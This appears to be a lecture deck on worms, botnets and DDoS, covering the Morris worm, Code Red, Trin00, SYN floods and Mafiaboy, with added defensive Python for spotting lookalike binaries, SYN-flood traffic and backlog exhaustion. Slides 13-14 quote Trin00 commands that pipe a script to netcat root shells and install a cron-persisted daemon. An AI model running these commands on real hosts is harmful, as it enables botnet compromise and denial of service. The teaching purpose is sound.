
Worms, Botnets, and DDoS




  1. Worms, Botnets, and DDoS Wide-spread Internet attacks

  2. Worms • Active network propagation • Replicates (like a virus) • Operates independently of users • Compromise remote machines • Insecure services • Copy themselves to that machine

  3. Morris Worm • Released on Nov 2, 1988 • Morris was a Cornell Ph.D. student • Objective • A program to “live” in the Internet • Steps • Determine where to spread • Spread its infection • Remain undiscovered and undiscoverable

  4. Morris Worm • Where to spread • netstat -r -n • /etc/hosts • Yellow pages distributed hosts file • Tries all local addresses

  5. Morris Worm • Security flaws to exploit • Weak password for rsh • Buffer overflow in fingerd program • Trapdoor in sendmail mail handler • DEBUG mode

  6. Morris Worm • Disguise • Remove all the traces from disks • Save all files in memory, encrypted • Change its process name periodically • Oops • sendmail log files • Monitoring • 1/15 chance it sends a byte to a server at Berkeley

  7. Morris Worm • Effects • Bug in the worm • Resource exhaustion, disconnection, isolation • $10-100M damage • Robert? • Tried and convicted of violating the 1986 Computer Fraud and Abuse Act • First conviction! • 3 years probation • 400 hours of community service • $10,000 fine

  8. Code Red • Appeared in the middle of 2001 • On July 19, it infected more than 250,000 systems in nine hours • Infection • Using Microsoft’s Internet Information Server • Using buffer overflows • Propagation • Checks IP addresses on port 80 of the PC to see if the web server is vulnerable

  9. Worm Spreading • What is different from a virus? • Finding targets • Scanning random addresses • High rate of traffic • Defense? • Be specific

  10. Botnets • Zombies • Many available networked computers • High-speed Internet connections • Automated attacks • No sophisticated hacking • Software and OS are homogeneous • 10,000 to 50? Million

  11. Uses of Botnets • DDoS • DSL @ 300 Kbps X ??? Bots = Flooded • Extortion • Spam • Ad revenue • Phishing & ID theft • Spreading malware • Sell • Compromise machines for others’ use

  12. Anatomy of a Zombie • An Example (from GRC.com, 2001) • rundll.exe vs. rundIl.exe (note the capital ‘eye’ in place of the ‘ell’) • Check the font in your Windows registry • Connection • IRC server • Join a secret, password protected channel • Wait for instructions • Download a trojan • Attack on command • with or without trojan
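
The slide's point is that a zombie hides behind a file name that is visually identical to a legitimate one (a capital I where an l belongs). The following is an added example, not part of the lecture, of the check a defender can run over a list of autostart or process names: it folds visually confusable characters to one canonical glyph and also catches one-character variants. The allow-list `KNOWN_BINARIES` and the sample entries are constructed for the demo.

```python
# Constructed allow-list of legitimate binary names for the demo;
# a real check would take it from a known-good inventory of the host.
KNOWN_BINARIES = ["rundll.exe", "rundll32.exe", "svchost.exe", "lsass.exe", "explorer.exe"]

# Glyphs that look alike in common UI fonts: capital I, digit 1 and the pipe
# for lower-case l; capital O and digit 0 for lower-case o; 5 and $ for s.
CONFUSABLES = str.maketrans({"I": "l", "1": "l", "|": "l", "O": "o", "0": "o", "5": "s", "$": "s"})


def fold(name):
    """Map confusable glyphs to a canonical letter, then lower-case the result."""
    return name.translate(CONFUSABLES).lower()


def edit_distance(a, b):
    """Levenshtein distance, used to catch one-character variants of a known name."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def lookalike_of(name, known=KNOWN_BINARIES):
    """Return (mimicked_name, reason) if `name` imitates a known binary, else None."""
    if name.lower() in {k.lower() for k in known}:
        return None  # exactly a known name: nothing to flag here
    folded = fold(name)
    for k in known:
        if folded == fold(k):
            return (k, "confusable characters")
    for k in known:
        if edit_distance(folded, fold(k)) == 1:
            return (k, "one-character variant")
    return None


def audit(names, known=KNOWN_BINARIES):
    """Return [(suspicious_name, mimicked_name, reason), ...] for a list of entries."""
    hits = []
    for n in names:
        hit = lookalike_of(n, known)
        if hit:
            hits.append((n, hit[0], hit[1]))
    return hits


if __name__ == "__main__":
    # Constructed sample of autostart entries, including the slide's rundIl.exe.
    sample = ["explorer.exe", "rundIl.exe", "svch0st.exe", "lsas.exe", "notepad.exe"]
    for name, mimics, reason in audit(sample):
        print(f"{name}: looks like {mimics} ({reason})")
```

The fold step is what makes the slide's "note the eye" trick visible to a program: after folding, `rundIl.exe` and `rundll.exe` are the same string, so the impostor is reported even though a byte-for-byte comparison against the allow-list would pass it.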

  13. Sample Connections: Trin00 • Use netcat (nc) • Pipe a shell script (shell commands) • Root shell listening on port 1524/tcp
      ./trin.sh | nc 128.aaa.167.217 1524 &
      ./trin.sh | nc 128.aaa.167.218 1524 &
      ./trin.sh | nc 128.aaa.167.219 1524 &
      ./trin.sh | nc 128.aaa.187.38 1524 &
      ./trin.sh | nc 128.bbb.2.80 1524 &
      ./trin.sh | nc 128.bbb.2.81 1524 &
      ./trin.sh | nc 128.bbb.2.238 1524 &
      ./trin.sh | nc 128.ccc.12.22 1524 &
      ./trin.sh | nc 128.ccc.12.50 1524 &
      . . .

  14. Sample Script • The script "trin.sh" looks like this:
      #Remote copy of the "leaf" program to an unsuspicious location
      echo "rcp 192.168.0.1:leaf /usr/sbin/rpc.listen"
      echo "chmod +x /usr/sbin/rpc.listen"    #Make it executable
      echo "echo launching trinoo"
      echo "/usr/sbin/rpc.listen"             #Run "leaf"
      #Set it up as a Cron job. Restart it every minute.
      echo "echo \* \* \* \* \* /usr/sbin/rpc.listen > cron"
      echo "crontab cron"
      echo "echo launched"
      echo "exit"

  15. Attack Topology (figure) • Three tiers: Attackers → Masters → Daemons • Node labels shown in the figure: dns1.uta.edu, sCUdATK, www3.security.com, mail.company.com, ^^hATEr^^

  16. New Topologies • Trin00 • IRC: No master to catch • Conficker • 7M Bots • Rotating Web sites • Storm • Structured P2P Network • Millions of bots for spam and DDoS

  17. Distributed DOS = DDOS • Step 1 • Get a lot of bots (100’s) • Step 2 • Flood the target full blast from every bot • IP spoofing?

  18. Real World DDoS
      0.224610 119.226.89.96 -> victim TCP 33081 > 60785 [SYN] Seq=3693150756 Ack=0 Win=32768 Len=0
      0.224610 victim -> 223.144.66.65 TCP 52284 > 19586 [RST, ACK] Seq=0 Ack=423694111 Win=0 Len=0
      0.224610 3.41.60.116 -> victim TCP 5594 > 40940 [SYN] Seq=2132997225 Ack=0 Win=32768 Len=0
      0.224610 victim -> 50.180.94.71 TCP 33289 > 11952 [RST, ACK] Seq=0 Ack=1790973261 Win=0 Len=0
      0.224610 244.214.39.108 -> victim TCP 38802 > 23759 [SYN] Seq=747020069 Ack=0 Win=32768 Len=0
      0.224610 victim -> 198.183.172.81 TCP 57223 > 43146 [RST, ACK] Seq=0 Ack=3749566807 Win=0 Len=0
      0.224610 64.81.138.119 -> victim UDP Source port: 1026 Destination port: 24661
      0.224610 victim -> 96.247.9.94 TCP 48931 > 50749 [RST, ACK] Seq=0 Ack=1188357973 Win=0 Len=0
      0.224610 103.227.64.42 -> victim TCP 45715 > 63366 [] Seq=3389528594 Ack=0 Win=16384 Len=0
      0.224610 victim -> 211.107.218.23 TCP 12666 > 48183 [RST, ACK] Seq=0 Ack=2803931407 Win=0 Len=0
      0.224610 87.29.46.64 -> victim TCP 17092 > 47365 [SYN] Seq=3446572548 Ack=0 Win=32768 Len=0
      0.224610 victim -> 58.24.148.57 TCP 26667 > 9797 [RST, ACK] Seq=0 Ack=3710546447 Win=0 Len=0
      0.224610 8.116.40.43 -> victim TCP 38367 > 32889 [SYN] Seq=1914703987 Ack=0 Win=32768 Len=0
      0.225448 victim -> 68.132.173.125 TCP 64470 > 35524 [RST, ACK] Seq=0 Ack=1819819023 Win=0 Len=0
      0.225448 75.115.186.26 -> victim TCP 4082 > 29772 [SYN] Seq=4245878839 Ack=0 Win=32768 Len=0
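
The capture above shows the two signatures a defender looks for in a SYN flood: inbound SYNs from many unrelated addresses that are never followed by the handshake's final ACK, and the victim's own RST/ACK "backscatter" going out to addresses that never sent anything. Slide 23's filtering advice ("check for repeated IPs") only works when the same source shows up again and again, which the randomly spoofed sources here defeat. The following is an added example, not part of the lecture, that parses lines in the slide's tshark-style format and computes both checks; `SAMPLE_CAPTURE` mixes lines copied from the slide with a few constructed ones (a repeated source and one legitimate completed handshake), and the thresholds are assumptions chosen for the demo.

```python
import re
from collections import Counter
from dataclasses import dataclass

# One packet per line, in the format shown on the slide.
LINE_RE = re.compile(
    r"^(?P<ts>\d+\.\d+)\s+(?P<src>\S+)\s+->\s+(?P<dst>\S+)\s+(?P<proto>TCP|UDP)\s+(?P<rest>.*)$"
)
TCP_RE = re.compile(r"(?P<sport>\d+) > (?P<dport>\d+) \[(?P<flags>[^\]]*)\]")

# Thresholds are assumptions for the demo, not values from the slides.
MIN_SYNS = 5           # fewer SYNs than this is not worth a verdict
MAX_COMPLETION = 0.5   # healthy traffic completes most of its handshakes
REPEAT_THRESHOLD = 2   # "check for repeated IPs": a source with this many SYNs is listed

# Constructed sample: slide lines plus a repeated source and one real handshake.
SAMPLE_CAPTURE = [
    "0.224610 119.226.89.96 -> victim TCP 33081 > 60785 [SYN] Seq=3693150756 Ack=0 Win=32768 Len=0",
    "0.224610 victim -> 223.144.66.65 TCP 52284 > 19586 [RST, ACK] Seq=0 Ack=423694111 Win=0 Len=0",
    "0.224610 3.41.60.116 -> victim TCP 5594 > 40940 [SYN] Seq=2132997225 Ack=0 Win=32768 Len=0",
    "0.224610 64.81.138.119 -> victim UDP Source port: 1026 Destination port: 24661",
    "0.224610 103.227.64.42 -> victim TCP 45715 > 63366 [] Seq=3389528594 Ack=0 Win=16384 Len=0",
    "0.224610 victim -> 211.107.218.23 TCP 12666 > 48183 [RST, ACK] Seq=0 Ack=2803931407 Win=0 Len=0",
    "0.224610 87.29.46.64 -> victim TCP 17092 > 47365 [SYN] Seq=3446572548 Ack=0 Win=32768 Len=0",
    "0.225448 75.115.186.26 -> victim TCP 4082 > 29772 [SYN] Seq=4245878839 Ack=0 Win=32768 Len=0",
    "0.225448 75.115.186.26 -> victim TCP 4083 > 29772 [SYN] Seq=4245878840 Ack=0 Win=32768 Len=0",
    "0.230000 10.0.0.5 -> victim TCP 40000 > 80 [SYN] Seq=1 Ack=0 Win=65535 Len=0",
    "0.231000 10.0.0.5 -> victim TCP 40000 > 80 [ACK] Seq=2 Ack=101 Win=65535 Len=0",
]


@dataclass(frozen=True)
class Packet:
    ts: float
    src: str
    dst: str
    proto: str
    flags: frozenset


def parse_line(line):
    """Parse one capture line; return None for lines that do not match the format."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    flags = frozenset()
    if m["proto"] == "TCP":
        t = TCP_RE.search(m["rest"])
        if t:
            flags = frozenset(f.strip() for f in t["flags"].split(",") if f.strip())
    return Packet(float(m["ts"]), m["src"], m["dst"], m["proto"], flags)


def summarize(lines, victim="victim"):
    """Count half-open SYNs, completed handshakes and backscatter, then give a verdict."""
    pkts = [p for p in map(parse_line, lines) if p]
    inbound = [p for p in pkts if p.dst == victim and p.proto == "TCP"]
    syns = [p for p in inbound if p.flags == {"SYN"}]
    # A plain ACK (no SYN, no RST) from a client is the third step of the handshake.
    completions = [p for p in inbound if "ACK" in p.flags and not (p.flags & {"SYN", "RST"})]
    # RST/ACK leaving the victim towards hosts that never spoke to it is backscatter.
    backscatter = [p for p in pkts if p.src == victim and p.flags >= {"RST", "ACK"}]
    per_source = Counter(p.src for p in syns)
    syn_count = len(syns)
    completion_ratio = len(completions) / syn_count if syn_count else 1.0
    return {
        "syn_count": syn_count,
        "distinct_syn_sources": len(per_source),
        "completed_handshakes": len(completions),
        "backscatter_rst_ack": len(backscatter),
        "repeated_sources": sorted(ip for ip, n in per_source.items() if n >= REPEAT_THRESHOLD),
        "syn_flood": syn_count >= MIN_SYNS and completion_ratio < MAX_COMPLETION,
        # When almost every SYN has its own source, the repeated-IP filter alone will miss the flood.
        "sources_look_spoofed": syn_count >= MIN_SYNS and len(per_source) / syn_count > 0.8,
    }


def summarize_sample():
    return summarize(SAMPLE_CAPTURE)


if __name__ == "__main__":
    for key, value in summarize_sample().items():
        print(f"{key}: {value}")
```

On the constructed sample the repeated-IP rule catches only the one source that sent twice, while the completion-ratio rule flags the flood as a whole; in a real deployment the same two counters would be kept per time window rather than over the whole file.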

  19. SYN Flood • TCP 3-way handshake (figure)
      Client → Server: SYN=1, seq=963                 Server state: LISTEN → SYN_RCVD
      Server → Client: SYN=1, seq=382, ack=964
      Client → Server: SYN=0, seq=964, ack=383        Server state: ESTAB.

  20. SYN Flood • TCP 3-way handshake under attack (figure) • The figure shows five segments SYN=1, seq=963 arriving at a server in state LISTEN • The server answers each with SYN=1, seq=382, ack=964 and holds five entries in state SYN_RCVD • The final ACK never arrives, so none of the five entries reaches ESTAB.

  21. SYN Flood • Server • Enters the SYN_RCVD state • Limited # of connections allowed • Legit users can’t connect • Fix 1: allow more connections • Attack on Fix 1: Memory, processing, and bandwidth • SYN Flood • Open a TCP connection (SYN) • Don’t respond to the SYN/ACK • Repeat!
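
The slide's argument is a capacity one: every SYN/ACK the server sends pins a SYN_RCVD entry in a table of limited size, an attacker who never sends the final ACK fills that table, and "Fix 1: allow more connections" only raises the number of SYNs the attacker has to send. The following is an added simulation, not the lecture's code, that models the half-open table and plays out that exchange: `bots` spoofed sources send one SYN each and never answer, then `legit` clients try to complete a normal handshake. The capacities, timeout and arrival times are constructed values for the demo.

```python
class SynBacklog:
    """Server-side queue of half-open (SYN_RCVD) connections with a fixed capacity.

    An accepted SYN occupies one slot until the client's ACK arrives or the entry
    times out; a SYN that arrives while every slot is taken is dropped.
    """

    def __init__(self, capacity, syn_timeout):
        self.capacity = capacity
        self.syn_timeout = syn_timeout
        self.half_open = {}      # client id -> time at which the entry expires
        self.established = 0
        self.dropped = 0

    def _expire(self, now):
        self.half_open = {c: exp for c, exp in self.half_open.items() if exp > now}

    def on_syn(self, now, client):
        """Handle an incoming SYN; return True if a SYN_RCVD slot was allocated."""
        self._expire(now)
        if len(self.half_open) >= self.capacity:
            self.dropped += 1
            return False
        self.half_open[client] = now + self.syn_timeout
        return True

    def on_ack(self, now, client):
        """Handle the handshake's final ACK; return True if the connection is established."""
        self._expire(now)
        if client not in self.half_open:
            return False
        del self.half_open[client]
        self.established += 1
        return True


def run_scenario(capacity, syn_timeout, bots, legit, legit_at=1.0):
    """Return (legit_established, legit_dropped) after a burst of never-ACKed SYNs.

    Constructed scenario: `bots` distinct spoofed sources each send one SYN at t=0
    and never answer the SYN/ACK; `legit` well-behaved clients arrive at t=legit_at
    and complete the handshake 0.1 s later.
    """
    server = SynBacklog(capacity, syn_timeout)
    for i in range(bots):
        server.on_syn(0.0, f"bot-{i}")
    established = dropped = 0
    for i in range(legit):
        client = f"legit-{i}"
        if server.on_syn(legit_at, client) and server.on_ack(legit_at + 0.1, client):
            established += 1
        else:
            dropped += 1
    return established, dropped


if __name__ == "__main__":
    print("backlog 128, 200 bots:           ", run_scenario(128, 60.0, 200, 5))
    print("Fix 1 (backlog 1024), 200 bots:  ", run_scenario(1024, 60.0, 200, 5))
    print("Fix 1, attacker sends 2000:      ", run_scenario(1024, 60.0, 2000, 5))
    print("backlog 128, legit after timeout:", run_scenario(128, 60.0, 200, 5, legit_at=70.0))
```

The last scenario shows the other lever the slide implies: a half-open entry is only held until its SYN timeout, so shortening that timeout (at the cost of dropping slow legitimate clients) shrinks the window during which a given burst of SYNs blocks the table.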

  22. SYN Flood +’s & -’s • Advantages • Less cost than brute force • Can look the same as legit traffic • Disadvantage • SYN/ACK traffic comes back • Unless spoofed IP • But far less than sent, on average

  23. Defenses • Filtering • SYN floods: check for repeated IPs • Only allow specific forms of UDP • Expensive • $12K/Mo. • Network response can drop by several seconds • Pay the Extortion fees

  24. Detecting DoS Attacks • Not immediate • Network failure • Slashdot effect • Easy to hide • Use spoofed IP packets and reflection • How do we find these attackers?

  25. Mafiaboy • 2000: Amazon, Dell, eBay • http://www.ecommercetimes.com/perl/story/3044.html “The teen hacker apparently made himself easy to find. He reportedly used an ISP that tracked his activities and made boastful claims -- including information only the hacker would know -- in Internet chat rooms.” • http://www.zdnet.com/zdnn/stories/news/0,4586,2552467,00.html But in what could be a warning to Web sites, authorities said the hacker was not especially skilled technically, yet he was able to cripple a handful of prominent Web sites. “He had a good knowledge of computers, but he was not what we would call a genius” said Staff Sergeant Jean-Pierre Roy of the Royal Canadian Mounted Police (RCMP) during a news conference Wednesday.

  26. The End
